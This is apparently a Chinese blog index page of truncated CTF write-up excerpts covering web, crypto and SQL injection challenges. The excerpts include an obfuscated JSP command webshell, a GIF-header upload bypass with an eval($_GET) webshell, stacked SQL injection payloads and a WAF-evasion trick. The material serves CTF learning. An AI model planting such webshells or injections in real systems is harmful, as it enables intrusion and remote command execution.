CTF
Fstone2020
这个作者很懒,什么都没留下…
展开
-
huaiweictf 部分 web
webWEBSHELL_1免杀shell<%@ page contentType="text/html;charset=UTF-8" language="java" %><% if(request.getParameter("cmd")!=null){ Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117,原创 2020-12-22 15:42:55 · 476 阅读 · 1 评论 -
[2020hxb] 部分wp
webweb1 题目名字不重要反正题挺简单的就在phpinfo里面 。。。。源码放一下 感觉200分没这么好拿的样子,可能有别的解法。<?phperror_reporting(0);//I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker.if ( isset($_GET['file']) ) { $file = $_GET['file'];原创 2020-11-03 15:14:07 · 376 阅读 · 0 评论 -
2020CISCN 西南赛区 部分web
就做了两道题,一天做一道,一道坐一天。 @(huaji_han)简单的web题目发现有源码泄漏 www.rar有发现有key.php,里面发现有个shell<?php class XJNU{ private function flag(){ echo $flag; } } if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['f'])){ die("do not attack原创 2020-10-05 19:16:15 · 447 阅读 · 0 评论 -
2020重庆市教育局网络安全攻防比赛
crypto1密文Jxyi yi oekh tqo.Jxyi yi oekh suburhqjyed., qdt jxu vbqw yi vv97v97t5t1ss32t9q5u62s2uu1t2v2s, ikrcyj myjx vbqw qdt {}该题是替换密码直接用在线网站爆破https://quipqiup.com/多确定两个完整的单词后 结果就出来了明文This is your day.This is your celebration., and the flag is ff9原创 2020-09-15 23:49:47 · 4264 阅读 · 5 评论 -
WMCTF2020
webweb_checkin源码<?php//PHP 7.0.33 Apache/2.4.25error_reporting(0);$sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);@mkdir($sandbox);@chdir($sandbox);highlight_file(__FILE__);if(isset($_GET['content'])) { $content = $_GET['content原创 2020-08-14 20:59:36 · 1068 阅读 · 0 评论 -
DASCTF2020 7月月赛
bullshit题目from flag import flagdef pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flagdef encrypt(message): res = '' for i in range(0,le原创 2020-07-25 19:27:35 · 760 阅读 · 0 评论 -
BUUCTF [SUCTF 2019]CheckIn
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功发现添加图片头文件就可以绕过GIF89a上传php文件的时候发现过滤了<?绕过检测<script language='php'></script>构造图片马GIF89a<script language='php'>eval($_GET['...原创 2020-02-07 19:51:54 · 1602 阅读 · 0 评论 -
BUUTCTF [RoarCTF 2019]Easy Calc
查看一下源码发现计算的时候请求了一个calc.php发现过滤了一些特殊字符直接传num=phpinfo() ,发现请求失败,应该是被防火墙过滤掉利用php的解析特性,绕过防火墙检测。因为php解析GET POST请求的时候会自动过滤掉空格,而防火墙不会。如:num=phpinfo()%20num=phpinfo()在php解析的时候就是一个东西,防火墙则会当成两个变量成...原创 2020-01-19 14:34:09 · 1123 阅读 · 1 评论 -
BUUCTF [强网杯 2019]高明的黑客
根据提示在url/www.tar.gz拿到源码随便打开几个看看有很多shell 不过都是些不能用的 由于文件太多还是些脚本跑吧 (python3)import osimport reimport requestsfrom multiprocessing import PoolfilePath = "E:\phpstudy_pro\WWW\src"url = "http://1...原创 2020-01-14 19:16:17 · 1109 阅读 · 0 评论 -
BUUCTF [HCTF 2018]admin
第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面查看一下源码有个注释 应该是提示我们用admin账号登录先随便注册一个账号看看登录成功后有三个界面随便看了看 先去登录注册页面试试有什么注入没有在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性报错了 ,好像没行。不过这界面还能运行python可以看见一些东西 ,感觉...原创 2020-01-11 15:59:43 · 1126 阅读 · 2 评论 -
BUUCTF [SUCTF 2019]EasySQL
打开界面试了一下有三种显示还有一个没有输出可以堆叠注入1;show databases; 1;show tables; 可以看到有一个Flag表测试发现from flag都被过滤不能直接读到flag想了很久想不到 看别人wp了~看见听说比赛的时候原理泄漏了的select $_GET['query'] || flag from flag是这样 md 谁想的到啊 别...原创 2020-01-10 21:39:25 · 7532 阅读 · 2 评论 -
BUUCTF [强网杯 2019]随便注
打开题目看见一个输入框输入’报错 应该是有sql注入了使用 1’ # 正确显示直接上 order by1' order by 3 #测试1,2正常,3报错此时天真的我以为我已经离成功不远了~~启动联合查询-1' union select 1,2 #提交继续...原创 2020-01-09 22:11:37 · 1115 阅读 · 0 评论 -
BUUCTF [HCTF 2018] WarmUp
开局一张图 直接查看源码发现注释source.php访问获得源码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"s...原创 2020-01-08 19:39:43 · 580 阅读 · 0 评论